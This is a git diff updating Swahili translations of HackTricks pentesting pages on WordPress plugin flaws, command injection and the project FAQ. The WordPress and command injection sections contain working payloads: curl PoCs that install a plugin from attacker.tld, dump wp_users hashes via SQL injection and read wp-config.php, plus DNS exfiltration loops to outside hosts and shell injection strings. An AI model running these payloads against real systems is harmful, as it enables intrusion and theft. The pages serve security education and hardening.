+- Sensitive REST route ilindwa tu na ushahidi wa utambulisho wenye entropy ndogo (username) au kukosekana kwa permission_callback
+- Hakuna utekelezaji wa capability; minted key inakubaliwa kama njia ya kupita bila vizuizi
 
-Orodha ya utambuzi
-- Grep code ya plugin kwa register_rest_route(..., [ 'permission_callback' => '__return_true' ])
-- Route yoyote inayotoa tokens/keys msingi kwenye utambulisho uliowezwa na ombi (username/email) bila kuhusisha na mtumiaji aliyethibitishwa au capability
-- Angalia routes zilizofuata zinazokubali token/key iliyotengenezwa bila ukaguzi wa capability upande wa server
+Detection checklist
+- Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ])
+- Route yoyote inayotoa tokens/keys kwa msingi wa identity iliyotolewa na ombi (username/email) bila kuihusisha na authenticated user au capability
+- Tafuta routes zinazofuata zinazokubali minted token/key bila ukaguzi wa capability upande wa server
 
-Kuimarisha usalama
-- Kwa REST route yoyote yenye privileges: hitaji permission_callback inayotekeleza current_user_can() kwa capability inayohitajika
-- Usitengeneze funguo zenye muda mrefu kutoka kwa utambulisho uliotolewa na mteja; ikiwa inahitajika, toa tokens fupi-muda, zenye uhusiano na mtumiaji baada ya authentication na ukague tena capabilities wakati wa matumizi
-- Thibitisha muktadha wa mtumiaji wa mpiga wito (caller) (wp_set_current_user haitoshi peke yake) na kata maombi ambapo !is_user_logged_in() || !current_user_can(<cap>)
+Hardening
+- Kwa route yoyote ya REST yenye mamlaka: weka permission_callback inayotekeleza current_user_can() kwa capability inayohitajika
+- Usitengeneze (mint) long-lived keys kutoka kwa identity iliyotolewa na client; kama inahitajika, toa short-lived, user-bound tokens post-authentication na rudia ukaguzi wa capabilities wakati zinapotumika
+- Thibitisha muktadha wa user wa mtumaji (wp_set_current_user is not sufficient alone) na kata maombi ambapo !is_user_logged_in() || !current_user_can(<cap>)
 
 ---
 
-## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3)
+## Nonce gate misuse → ufungaji wa plugin kiholela bila uthibitisho (FunnelKit Automations ≤ 3.5.3)
 
-Nonces zinazuia CSRF, si uthibitisho wa ruhusa. Ikiwa code itachukulia kupitishwa kwa nonce kama kibali na kisha kuruka ukaguzi wa capability kwa operesheni zenye ruhusa (mf., install/activate plugins), washambuliaji wasio na uthibitisho wanaweza kukidhi mahitaji dhaifu ya nonce na kufikia RCE kwa kusakinisha plugin backdoored au yenye udhaifu.
+Nonces huzuia CSRF, sio idhini. Ikiwa code itashughulikia kupitishwa kwa nonce kama ishara ya kuendelea kisha ikaruka ukaguzi wa capability kwa operesheni zenye mamlaka (mf., install/activate plugins), washambuliaji wasiothibitishwa wanaweza kukidhi hitaji dhaifu la nonce na kufikia RCE kwa kusakinisha plugin iliyo na backdoor au yenye udhaifu.
 
 - Vulnerable path: plugin/install_and_activate
 - Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes”
 - Impact: full compromise via arbitrary plugin install/activation
 
-PoC (umbo hutegemea plugin; ni kwa mfano tu)
+PoC (muundo unategemea plugin; mfano tu)
 ```bash
 curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_activate \
 -H 'Content-Type: application/json' \
 --data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}'
 ```
 Detection checklist
-- REST/AJAX handlers zinazobadilisha plugins/themes kwa kutumia tu wp_verify_nonce()/check_admin_referer() na bila capability check
-- Njia yoyote ya code inayoweka $skip_caps = true baada ya nonce validation
+- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check
+- Any code path that sets $skip_caps = true after nonce validation
 
 Hardening
-- Daima tibu nonces kama tokeni za CSRF pekee; lazimisha capability checks bila kujali hali ya nonce
-- Lazimisha current_user_can('install_plugins') na current_user_can('activate_plugins') kabla ya kufikia installer code
-- Kataa ufikiaji usioathibitishwa; epuka kufichua nopriv AJAX actions kwa mifereji inayohitaji ruhusa
+- Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state
+- Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code
+- Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows
 
 ---
 
-## SQLi bila uthibitisho kupitia parameter ya s (search) katika depicter-* actions (Depicter Slider ≤ 3.6.1)
+## SQLi isiyothibitishwa kupitia parameta s (search) katika depicter-* actions (Depicter Slider ≤ 3.6.1)
 
-Vitendo kadhaa za depicter-* zilitumia parameter s (search) na kuichanganya ndani ya maswali ya SQL bila parameterization.
+Actions nyingi za depicter-* zilitumia parameta s (search) na kuiiunganisha katika SQL queries bila parameterization.
 
-- Kigezo: s (search)
-- Hitilafu: kuunganisha mnyororo wa maandishi moja kwa moja katika WHERE/LIKE clauses; hakuna prepared statements/sanitization
-- Athari: database exfiltration (users, hashes), lateral movement
+- Parameter: s (search)
+- Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization
+- Impact: database exfiltration (users, hashes), lateral movement
 
 PoC
 ```bash
@@ -812,38 +812,38 @@ curl -G "https://victim.tld/wp-admin/admin-ajax.php" \
 --data-urlencode 'action=depicter_search' \
 --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -"
 ```
-Detection checklist
-- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL
+Orodha ya ugunduzi
+- Tumia grep kutafuta depicter-* action handlers na matumizi ya moja kwa moja ya $_GET['s'] au $_POST['s'] katika SQL
 - Pitia custom queries zinazopitishwa kwa $wpdb->get_results()/query() zinazochanganya s
 
-Hardening
-- Tumia kila mara $wpdb->prepare() au wpdb placeholders; kataa metacharacters zisizotarajiwa upande wa server
-- Ongeza allowlist kali kwa s na linganisha hadi charset/length inayotarajiwa
+Kuimarisha
+- Daima tumia $wpdb->prepare() au wpdb placeholders; kataza metacharacters zisizotarajiwa upande wa server
+- Ongeza strict allowlist kwa s na normaliza kwa charset/urefu unaotarajiwa
 
 ---
 
-## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1)
+## Unauthenticated Local File Inclusion kupitia njia ya template/file isiyotathminiwa (Kubio AI Page Builder ≤ 2.5.1)
 
-Kukubali paths zinazosimamiwa na mshambuliaji katika parameter ya template bila normalisation/containment kunaruhusu kusoma faili za ndani yoyote, na wakati mwingine code execution ikiwa faili za PHP/log zinazoweza kujumuishwa zitaletwa wakati wa runtime.
+Kukubali attacker-controlled paths katika kigezo cha template bila normalization/containment kunaruhusu kusoma faili za ndani kwa hiari, na wakati mwingine code execution ikiwa faili za PHP/log zinazoweza kuingizwa zinachukuliwa wakati wa runtime.
 
-- Parameter: __kubio-site-edit-iframe-classic-template
-- Flaw: hakuna normalisation/allowlisting; traversal umewezekana
-- Impact: ufichuaji wa siri (wp-config.php), uwezekano wa RCE katika mazingira maalum (log poisoning, includable PHP)
+- Kigezo: __kubio-site-edit-iframe-classic-template
+- Hitilafu: hakuna normalization/allowlisting; traversal inaruhusiwa
+- Athari: ufichaji wa siri (wp-config.php), uwezekano wa RCE katika mazingira maalum (log poisoning, includable PHP)
 
 PoC – soma wp-config.php
 ```bash
 curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php"
 ```
-Orodha ya utambuzi
-- Any handler anayechanganya request paths ndani ya include()/require()/read sinks bila realpath() containment
-- Tafuta traversal patterns (../) zinazofikia nje ya templates directory iliyokusudiwa
+Detection checklist
+- Handler yoyote anayechanganya request paths katika include()/require()/read sinks bila realpath() containment
+- Angalia traversal patterns (../) zinazofikia nje ya intended templates directory
 
-Uimarishaji
-- Lazimisha allowlisted templates; tatua kwa realpath() na require str_starts_with(realpath(file), realpath(allowed_base))
-- Normaliza input; kataa traversal sequences na absolute paths; tumia sanitize_file_name() only for filenames (not full paths)
+Hardening
+- Hakikisha allowlisted templates; tatua kwa realpath() na require str_starts_with(realpath(file), realpath(allowed_base))
+- Normalize input; kataa traversal sequences na absolute paths; tumia sanitize_file_name() tu kwa filenames (si full paths)
 
 
-## Marejeo
+## Marejeleo
 
 - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
 - [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index 01943e882..0b3de006a 100644
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@@ -4,11 +4,11 @@
 
 ## Je, command Injection ni nini?
 
-A **command injection** inaruhusu utekelezaji wa amri zozote za mfumo wa uendeshaji na mshambuliaji kwenye seva inayoweka application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kukomeshwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi.
+A **command injection** inaruhusu utekelezaji wa amri yoyote za operating system na attacker kwenye server inayohifadhi application. Kwa matokeo, application na data yake yote zinaweza kuchukuliwa kabisa. Utekelezaji wa hizi commands kawaida humruhusu attacker kupata ufikiaji usioruhusiwa au udhibiti wa environment ya application na system inayokua chini yake.
 
 ### Muktadha
 
-Kutegemea **mahali pembejeo zako zinaingizwa**, huenda ukahitaji **kumaliza muktadha uliomo ndani ya nukuu** (ukitumia `"` au `'`) kabla ya amri.
+Kutegemea **mahali ambako input yako inaingizwa** unaweza kuhitaji **kumaliza muktadha uliomo ndani ya nukuu** (kutumia `"` au `'`) kabla ya commands.
 
 ## Command Injection/Execution
 ```bash
@@ -30,9 +30,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
 > /var/www/html/out.txt #Try to redirect the output to a file
 < /etc/passwd #Try to send some input to the command
 ```
-### **Kizuizi** Bypasses
+### **Limition** Bypasses
 
-Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utavutiwa kusoma kuhusu **Bypasses** hizi:
+Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utapenda kusoma kuhusu **Bypasses:**
 
 
 {{#ref}}
@@ -47,7 +47,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod
 ```
 ### Vigezo
 
-Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu za RCE yanayofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)):
+Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu mwingine wa RCE (kutoka kwa [link](https://twitter.com/trbughunters/status/1283133356922884096)):
 ```
 ?cmd={payload}
 ?exec={payload}
@@ -75,9 +75,9 @@ Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu
 ?run={payload}
 ?print={payload}
 ```
-### Utoaji wa data unaotegemea wakati
+### Time based data exfiltration
 
-Kutoa data: herufi kwa herufi
+Kuchukua data: herufi kwa herufi
 ```
 swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 real    0m5.007s
@@ -91,7 +91,7 @@ sys 0m0.000s
 ```
 ### DNS based data exfiltration
 
-Inatokana na zana kutoka `https://github.com/HoLyVieR/dnsbin` pia imehifadhiwa kwenye dnsbin.zhack.ca
+Inategemea zana kutoka kwa `https://github.com/HoLyVieR/dnsbin`, pia inapatikana kwenye dnsbin.zhack.ca
 ```
 1. Go to http://dnsbin.zhack.ca/
 2. Execute a simple 'ls'
@@ -101,12 +101,12 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
 ```
-Zana za mtandaoni za kuangalia kuondolewa kwa data kwa kutumia DNS:
+Zana mtandaoni za kuangalia DNS based data exfiltration:
 
 - dnsbin.zhack.ca
 - pingb.in
 
-### Kupita kando kwa vichujio
+### Kuepuka vichujio
 
 #### Windows
 ```
@@ -122,7 +122,7 @@ powershell C:**2\n??e*d.*? # notepad
 
 ### Node.js `child_process.exec` vs `execFile`
 
-Unapofanya ukaguzi wa back-ends za JavaScript/TypeScript, mara nyingi utakutana na Node.js `child_process` API.
+Unapofanya ukaguzi wa back-end za JavaScript/TypeScript, mara nyingi utakutana na Node.js `child_process` API.
 ```javascript
 // Vulnerable: user-controlled variables interpolated inside a template string
 const { exec } = require('child_process');
@@ -130,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
 /* … */
 });
 ```
-`exec()` huanzisha **shell** (`/bin/sh -c`), kwa hivyo herufi/alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati pembejeo ya mtumiaji inapoambatanishwa ndani ya string.
+`exec()` inazindua **shell** (`/bin/sh -c`), hivyo alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa kwenye string.
 
-**Kudhibiti:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe:
+**Mitigation:**  tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na toa **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusike:
 ```javascript
 const { execFile } = require('child_process');
 execFile('/usr/bin/do-something', [
@@ -140,25 +140,25 @@ execFile('/usr/bin/do-something', [
 '--payload', JSON.stringify(payload)
 ]);
 ```
-Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilikuwa inaweza kutumiwa kupitia tukio la WebSocket lisilotambuliwa ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikafanikisha RCE (Pwn2Own Ireland 2024).
+Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilitumiwa kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data inayodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikiwaleta RCE (Pwn2Own Ireland 2024).
 
-### Uingizaji wa Argument/Option kupitia hyphen ya mwanzoni (argv, no shell metacharacters)
+### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
 
-Si uingizaji wote unahitaji shell metacharacters. Ikiwa programu inapitisha nyimbo zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kama chaguo. Hii inampa mshambuliaji nafasi ya kubadili hali, kubadilisha njia za output, au kuanzisha tabia hatari bila hata kuingia kwenye shell.
+Sio injection zote zinahitaji meta-herufi za shell. Ikiwa programu inapitisha nadharia zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa kutumia `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kuwa chaguo. Hii inamwezesha mshambuliaji kubadili mode, kubadilisha njia za pato, au kusababisha tabia hatarishi bila hata kuingia kwenye shell.
 
-Maeneo yanayojitokeza kawaida:
+Mahali pa kawaida ambapo hili huonekana:
 
-- UI za wavuti zilizojengwa/CGI handlers ambazo hujenga amri kama `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc.
-- Router za CGI zilizosimamiwa kwa pamoja (mfano, `/cgi-bin/<something>.cgi` na parameter ya selector kama `topicurl=<handler>`) ambapo handlers nyingi zinatumia validator dhaifu ile ile.
+- Embedded web UIs/CGI handlers zinazojenga amri kama `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, n.k.
+- Centralized CGI routers (mfano, `/cgi-bin/<something>.cgi` na parameter ya selector kama `topicurl=<handler>`) ambapo handlers nyingi zinatumia validator dhaifu ile ile.
 
 Nini cha kujaribu:
 
-- Toa thamani zinazotangulia na `-`/`--` ili zitumiwe kama flags na zana ya downstream.
-- Tumia vibaya flags ambazo hubadilisha tabia au kuandika faili, kwa mfano:
-- `ping`: `-f`/`-c 100000` kuumiza kifaa (DoS)
-- `curl`: `-o /tmp/x` kuandika njia yoyote, `-K <url>` kuingiza config inayodhibitiwa na mshambuliaji
-- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata utekelezwaji baada ya rotate katika wrappers zisizo salama
-- Iki programu inasaidia `--` end-of-options, jaribu kuiepuka mbinu za msingi za kuzuia zinazoweka `--` mahali pasipo sahihi.
+- Toa thamani zinazotangulia na `-`/`--` zitakazotumiwa kama flags na chombo kinachofuata.
+- Tumia vibaya flags zinazobadilisha tabia au kuandika faili, kwa mfano:
+- `ping`: `-f`/`-c 100000` kustresha kifaa (DoS)
+- `curl`: `-o /tmp/x` kuandika njia yoyote, `-K <url>` kupakia config inayodhibitiwa na mshambuliaji
+- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata post-rotate execution katika wrappers zisizo salama
+- Ikiwa programu inaunga mkono `--` end-of-options, jaribu kuizidi mitigations za kawaida ambazo zinaweka `--` mahali pasipofaa.
 
 Generic PoC shapes against centralized CGI dispatchers:
 ```
@@ -171,7 +171,7 @@ topicurl=<handler>&param=-n
 # Unauthenticated RCE when a handler concatenates into a shell
 topicurl=setEasyMeshAgentCfg&agentName=;id;
 ```
-## Orodha ya Ugundaji ya Brute-Force
+## Orodha ya Ugundaji wa Brute-Force
 
 
 {{#ref}}
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index 4dbc229a9..8925a77b5 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -1,21 +1,21 @@
-# Thamani za HackTricks & FAQ
+# Maadili ya HackTricks & FAQ
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Thamani za HackTricks
+## Maadili ya HackTricks
 
 > [!TIP]
-> Hizi ndio **thamani za Mradi wa HackTricks**:
+> Haya ndio **maadili ya Mradi wa HackTricks**:
 >
-> - Toa upatikanaji wa **BILA MALIPO** kwa rasilimali za **elimu za hacking** kwa **mtandao wote**.
->  - Hacking ni kuhusu kujifunza, na kujifunza kunapaswa kuwa kwa bure kadri inavyowezekana.
->  - Lengo la kitabu hiki ni kuitumikia kama rasilimali ya kina ya **elimu**.
-> - **Hifadhi** mbinu za kupendeza za **hacking** ambazo jamii inazichapisha na kuwapa **MAWANDISHI WA ASILI** wote **mikopo**.
->  - **Hatuotaki sifa kutoka kwa watu wengine**, tunataka tu kuhifadhi trick nzuri kwa kila mtu.
->  - Pia tunaandika **tafiti zetu** kwenye HackTricks.
->  - Katika kesi kadhaa tutaandika tu **katika HackTricks muhtasari wa sehemu muhimu** za mbinu na tuta**hamasisha msomaji atembelee chapisho la asili** kwa maelezo zaidi.
-> - **PANGA** mbinu zote za **hacking** kwenye kitabu ili ziwe **RAHISI KUPATIKANA ZAIDI**
->  - Timu ya HackTricks imejitolea maelfu ya masaa bila malipo **tu kupanga maudhui** ili watu waweze **kujifunza kwa haraka**
+> - Toa **UPATAKAJI WA BURE** wa rasilimali za **hacking za KITAALUMA** kwa **INTANETI YOTE**.
+>  - Hacking ni kuhusu kujifunza, na kujifunza kunapaswa kuwa bure kadri iwezekanavyo.
+>  - Madhumuni ya kitabu hiki ni kuhudumia kama **chanzo kamili cha kielimu**.
+> - **HIFADHI** mbinu za kushangaza za **hacking** ambazo jamii inazochapisha ikiwapa **WAANDISHI WA ASILI** sifa zote.
+>  - **Hatutaki sifa za watu wengine**, tunataka tu kuhifadhi mbinu nzuri kwa kila mtu.
+>  - Pia tunaandika **tafiti zetu** katika HackTricks.
+>  - Katika visa kadhaa tutataja tu **muhtasari wa sehemu muhimu** za mbinu katika HackTricks na tutamweka **msomaji atembee kwenye chapisho la asili** kwa maelezo zaidi.
+> - **PANGA** mbinu zote za **hacking** katika kitabu ili ziwe **RAHI KUPATIKANA**
+>  - Timu ya HackTricks imejitolea maelfu ya saa bure **kwa ajili tu ya kupanga yaliyomo** ili watu wajifunze kwa haraka zaidi
 
 <figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
 
@@ -23,35 +23,35 @@
 
 > [!TIP]
 >
-> - **Asante sana kwa rasilimali hizi, ninawezaje kuwashukuru?**
+> - **Asante sana kwa rasilimali hizi, naweza kuwashukuru vipi?**
 
-Unaweza kumshukuru kwa umma timu za HackTricks kwa kuandaa rasilimali hizi zote kwa kuchapisha tweet ukimtaja [**@hacktricks_live**](https://twitter.com/hacktricks_live).\
-Ikiwa umewashukuru sana unaweza pia [**kufadhili mradi hapa**](https://github.com/sponsors/carlospolop).\
-Na usisahau **kuweka nyota kwenye miradi ya Github!** (Tafuta viungo hapa chini).
+Unaweza kuwashukuru hadharani timu ya HackTricks kwa kupanga rasilimali hizi kwa kuchapisha tweet ukimtaja [**@hacktricks_live**](https://twitter.com/hacktricks_live).\
+Ikiwa una shukrani za kipekee unaweza pia [**kufadhili mradi hapa**](https://github.com/sponsors/carlospolop).\
+Na usisahau **kutoa nyota kwenye miradi ya Github!** (Angalia viungo hapo chini).
 
 > [!TIP]
 >
-> - **Ninawezaje kuchangia mradi?**
+> - **Ninaweza kuchangia mradi vipi?**
 
-Unaweza **share new tips and tricks with the community or fix bugs** unazopata katika vitabu kwa kutuma **Pull Request** kwa kurasa husika za Github:
+Unaweza **kushiriki vidokezo vipya na mbinu na jamii au kurekebisha bugs** unazopata katika vitabu kwa kutuma **Pull Request** kwa kurasa husika za Github:
 
-- https://github.com/carlospolop/hacktricks
-- https://github.com/carlospolop/hacktricks-cloud
+- [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
+- [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
 
-Usisahau **kuweka nyota kwenye miradi ya Github!**
+Usisahau **kutoa nyota kwenye miradi ya Github!**
 
 > [!TIP]
 >
-> - **Naweza kunakili baadhi ya maudhui kutoka HackTricks na kuyaweka kwenye blogu yangu?**
+> - **Je, ninaweza kunakili baadhi ya yaliyomo kutoka HackTricks na kuyaweka kwenye blogu yangu?**
 
-Ndiyo, unaweza, lakini **usisahau kutaja kiungo/viungo maalum** ambavyo maudhui yalichukuliwa kutoka.
+Ndiyo, unaweza, lakini **usisahau kutaja kiungo maalum ambapo yaliyomo yalichukuliwa**.
 
 > [!TIP]
 >
-> - **Ninawezaje kurejea ukurasa wa HackTricks?**
+> - **Ninawezaje kurejelea ukurasa wa HackTricks?**
 
-Mradi tu kiungo **cha** ukurasa(au kurasa) ulizotumia taarifa kutoka kinaonekana inatosha.\
-Ukihitaji bibtex unaweza kutumia kitu kama:
+Iwapo kiungo cha ukurasa(au kurasa) ambako ulipata taarifa kinaonekana basi hiyo inatosha.\
+Ikiwa unahitaji bibtex unaweza kutumia kitu kama:
 ```latex
 @misc{hacktricks-bibtexing,
 author = {"HackTricks Team" or the Authors name of the specific page/trick},
@@ -62,82 +62,82 @@ url = {\url{https://book.hacktricks.wiki/specific-page}},
 ```
 > [!WARNING]
 >
-> - **Naweza kunakili HackTricks zote kwenye blogi yangu?**
+> - **Je, ninaweza kunakili HackTricks yote kwenye blogu yangu?**
 
-**Ningependelea si.** Hiyo **haitamfaidi mtu yeyote** kwa sababu **maudhui yote tayari yamo hadharani** katika vitabu rasmi vya HackTricks kwa **bure**.
+**Napendelea sio hivyo**. Hii **haitamfaa mtu yeyote** kwa kuwa yaliyomo yote tayari **yapo hadharani** katika vitabu rasmi vya **HackTricks** kwa **bure**.
 
-Ikiwa una hofu kwamba yatafifia, fanya tu fork kwenye Github au jipakue; kama nilivyosema tayari ni bure.
+Ikiwa unaogopa kwamba yatafifia, fanya fork kwenye Github au uyapakue; kama nilivyosema, tayari ni bure.
 
 > [!WARNING]
 >
-> - **Kwa nini mna sponsors? Je, vitabu vya HackTricks vimetengenezwa kwa madhumuni ya kibiashara?**
+> - **Kwa nini mna wafadhili? Je, vitabu vya HackTricks vimeundwa kwa madhumuni ya kibiashara?**
 
-Thamani ya kwanza ya **HackTricks** ni kutoa rasilimali za elimu ya **hacking** ZA **BURE** kwa **WOTE** duniani. Timu ya HackTricks imejitolea maelfu ya saa kutoa maudhui haya, tena, kwa **BURE**.
+Thamani ya kwanza ya **HackTricks** ni kutoa rasilimali za kielimu za hacking kwa **BURE** kwa **WOTE** ulimwenguni. Timu ya **HackTricks** imeweka **maelfu ya masaa** kutoa yaliyomo haya, tena, kwa **BURE**.
 
-Ikiwa unafikiri vitabu vya HackTricks vimetengenezwa kwa **madhumuni ya kibiashara** uko **KOSA KABISA**.
+Ikiwa unadhani vitabu vya **HackTricks** vimetengenezwa kwa **madhumuni ya kibiashara** uko **UMEKOSEA KABISA**.
 
-Tuna sponsors kwa sababu, hata kama maudhui yote ni ZA **BURE**, tunataka kutoa jamii uwezekano wa kuthamini kazi yetu ikiwa wanaona inafaa. Kwa hiyo, tunawapa watu chaguo la kuchangia HackTricks kupitia [**Github sponsors**](https://github.com/sponsors/carlospolop), na kampuni zinazohusiana na cybersecurity kushirikiana na HackTricks na kuweka baadhi ya matangazo katika kitabu, huku matangazo hayo yakiwa yamewekwa sehemu zinazoonekana lakini **hazivurugi** mchakato wa kujifunza ikiwa mtu anazingatia maudhui.
+Tuna wafadhili kwa sababu, hata kama yaliyomo yote ni **BURE**, tunataka **kuwaruhusu watu jumuiya kutendea kazi yetu shukrani** ikiwa watataka. Kwa hivyo, tunawawezesha watu kuchangia HackTricks kupitia [**Github sponsors**](https://github.com/sponsors/carlospolop), na kampuni zinazohusiana na usalama wa mtandao kuchangia HackTricks na **kuwa na matangazo** kwenye kitabu, ambapo **matangazo** hayo hupangwa mahali yanayoonekana lakini **hayavurugi mchakato wa kujifunza** ikiwa mtu anazingatia yaliyomo.
 
-Hautapokea HackTricks ikiwa imejazwa na matangazo yanayekera kama blogi nyingine zenye maudhui kidogo kuliko HackTricks, kwa sababu HackTricks haijatengenezwa kwa madhumuni ya kibiashara.
+Hautapata HackTricks imejaa matangazo yanayokasirisha kama blogu zingine zenye yaliyomo kidogo zaidi kuliko HackTricks, kwa sababu HackTricks haijatengenezwa kwa madhumuni ya kibiashara.
 
 > [!CAUTION]
 >
-> - **Nifanye nini ikiwa ukurasa wa HackTricks umejengwa kwa msingi wa chapisho langu la blogi lakini haujatajwa chanzo?**
+> - **Nifanye nini ikiwa ukurasa fulani wa HackTricks umejengwa kwa kutumia chapisho langu la blogu lakini haujatajwa?**
 
-**Tunasikitika sana. Hii haipaswi kutokea.** Tafadhali tujulishe kupitia Github issues, Twitter, Discord... kiungo cha ukurasa wa HackTricks wenye maudhui na kiungo cha blogi yako na **tutakagua na kuiongeza ASAP**.
+**Tunasikitika sana. Hii haipaswi kuwa imekutokea.** Tafadhali tujulishe kupitia Github issues, Twitter, Discord... kiungo cha ukurasa wa HackTricks chenye yaliyomo na kiungo cha blogu yako na **tutakagua na kuiweka HARAKA IWEZAYO**.
 
 > [!CAUTION]
 >
-> - **Nifanye nini ikiwa kuna maudhui kutoka blogi yangu kwenye HackTricks na sitaki yawepo hapo?**
+> - **Nifanye nini ikiwa kuna yaliyomo kutoka kwenye blogu yangu katika HackTricks na sitaki yawepo hapo?**
 
-Kumbuka kwamba kuwa na viungo kwenye ukurasa wako katika HackTricks:
+Kumbuka kuwa kuwa na viungo vya ukurasa wako ndani ya HackTricks:
 
-- Huboresha **SEO** yako
-- Maudhui yanapata **kutafsiriwa katika lugha zaidi ya 15** na hivyo kuwawezesha watu wengi zaidi kuyapata
-- **HackTricks inahimiza** watu **kuangalia ukurasa wako** (watu kadhaa wametujulisha kwamba tangu ukurasa wao uanze kuwepo katika HackTricks wamepata ziara nyingi zaidi)
+- Kuboresha **SEO** yako
+- Yaliyomo yanatafsiriwa hadi **lugha zaidi ya 15**, hivyo kuwezesha watu wengi zaidi kupata yaliyomo haya
+- **HackTricks inahimiza** watu **kukagua ukurasa wako** (watu kadhaa wamesema tangu kurasa zao ziwepo HackTricks wamepata ziara zaidi)
 
-Hata hivyo, ikiwa bado unataka maudhui ya blogi yako yatoweke, tujulishe na bila shaka **tutaondoa kila kiungo kwa blogi yako**, na maudhui yoyote yaliyojengwa kutokana nayo.
+Hata hivyo, ikiwa bado unataka yaliyomo ya blogu yako yaondolewe kutoka HackTricks, tujulishe tu na tutafuta dhamana ya **kuondoa kila kiungo cha blogu yako**, na yoyote yaliyomo yanayotokana nayo.
 
 > [!CAUTION]
 >
-> - **Nifanye nini nikigundua maudhui yaliyopakuliwa (copy-pasted) kwenye HackTricks?**
+> - **Nifanye nini nikigundua yaliyomo yaliyonakiliwa (copy-pasted) katika HackTricks?**
 
-Daima **tunamtoa mwandishi wa asili sifa zote**. Ikiwa unapata ukurasa wenye maudhui yaliyopakuliwa bila chanzo cha asili kurejelewa, tujulishe na sisi tutafanya mojawapo ya yafuatayo: **tutaiondoa**, **tutaongeza kiungo kabla ya maandishi**, au **tutairekebisha kwa kuiongeza kiungo**.
+Daima tunatoa **sifa zote kwa waandishi wa asili**. Ikiwa utapata ukurasa ulio na yaliyomo yaliyonakiliwa bila marejeo ya chanzo asilia, tujulishe na tutafanya mojawapo ya yafuatayo: **kuondoa**, **kuongeza kiungo kabla ya maandishi**, au **kuandika upya tukiongeza kiungo**.
 
-## LESENI
+## LICENSE
 
 Hakimiliki © Haki zote zimehifadhiwa isipokuwa ilivyoainishwa vinginevyo.
 
 #### Muhtasari wa Leseni:
 
-- Utambulisho: Una uhuru wa:
